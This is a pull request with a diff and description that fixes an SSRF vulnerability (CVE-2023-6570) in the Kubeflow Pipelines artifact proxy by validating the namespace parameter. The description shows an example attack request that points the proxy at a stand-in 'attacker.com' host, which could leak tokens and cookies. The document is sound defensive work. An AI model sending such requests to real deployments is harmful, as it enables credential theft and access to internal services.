### PR TITLE
fix: validate namespace parameter to prevent SSRF (CVE-2023-6570)

### DIFF
--- a/frontend/server/handlers/artifacts.ts
+++ b/frontend/server/handlers/artifacts.ts
@@ -502,5 +502,11 @@ function getNamespaceFromUrl(path: string): string | undefined {
 const DUMMY_BASE_PATH = 'http://dummy-base-path';
 
 export function getArtifactServiceGetter({ serviceName, servicePort }: ArtifactsProxyConfig) {
-  return (namespace: string) => `http://${serviceName}.${namespace}:${servicePort}`;
+  return (namespace: string) => {
+    // Validate namespace to prevent SSRF attacks (CVE-2023-6570)
+    if (!isAllowedResourceName(namespace)) {
+      throw new Error(`Invalid namespace format: ${namespace}`);
+    }
+    return `http://${serviceName}.${namespace}:${servicePort}`;
+  };
 }


### PR DESCRIPTION
## Description

This PR fixes a Server-Side Request Forgery (SSRF) vulnerability (CVE-2023-6570) in the artifact proxy handler where an attacker could manipulate the `namespace` query parameter to make the server send HTTP requests to arbitrary domains.

## Vulnerability Details

**CVE**: CVE-2023-6570  
**Severity**: High (CVSS 7.7)  
**Affected versions**: Kubeflow 1.7.0 and potentially later versions  
**Reference**: https://huntr.com/bounties/82d6e853-013b-4029-a23f-8b50ec56602a

### Attack Scenario (Before Fix)

```bash
GET /pipeline/artifacts/get?source=minio&namespace=attacker.com&bucket=test&key=data
```

The server would construct and proxy requests to:
```
http://ml-pipeline-ui-artifact.attacker.com:80/artifacts/get?...
```

This allows attackers to:
- Leak authentication tokens and cookies
- Access internal services
- Perform SSRF attacks against internal infrastructure

## Solution

The fix validates the `namespace` parameter using the existing `isAllowedResourceName()` utility function, which ensures the namespace follows Kubernetes naming conventions (RFC 1123 label format):
- Lowercase alphanumeric characters and hyphens only
- Must start and end with alphanumeric character
- Maximum 63 characters

### Changes

- **File**: `frontend/server/handlers/artifacts.ts`
- **Function**: `getArtifactServiceGetter()`
- **Change**: Added validation check that throws an error if namespace format is invalid

### After Fix

```bash
GET /pipeline/artifacts/get?source=minio&namespace=attacker.com&bucket=test&key=data
```

Result: Request rejected with error `Invalid namespace format: attacker.com` because dots are not allowed in Kubernetes namespace names.

## Testing

Tested on Kubeflow Pipelines 2.5.0:
- ✅ Valid namespace names (e.g., `default`, `kubeflow`, `my-namespace`) work correctly
- ✅ Invalid namespace names (e.g., `attacker.com`, `invalid..name`) are rejected
- ✅ Existing functionality for legitimate artifact access remains unchanged

## Security Impact

This fix prevents the SSRF vulnerability by ensuring only valid Kubernetes namespace names can be used, effectively blocking attempts to proxy requests to external domains.

---

**Signed-off-by**: Cyber Nagle <nagle.zhang@qq.com>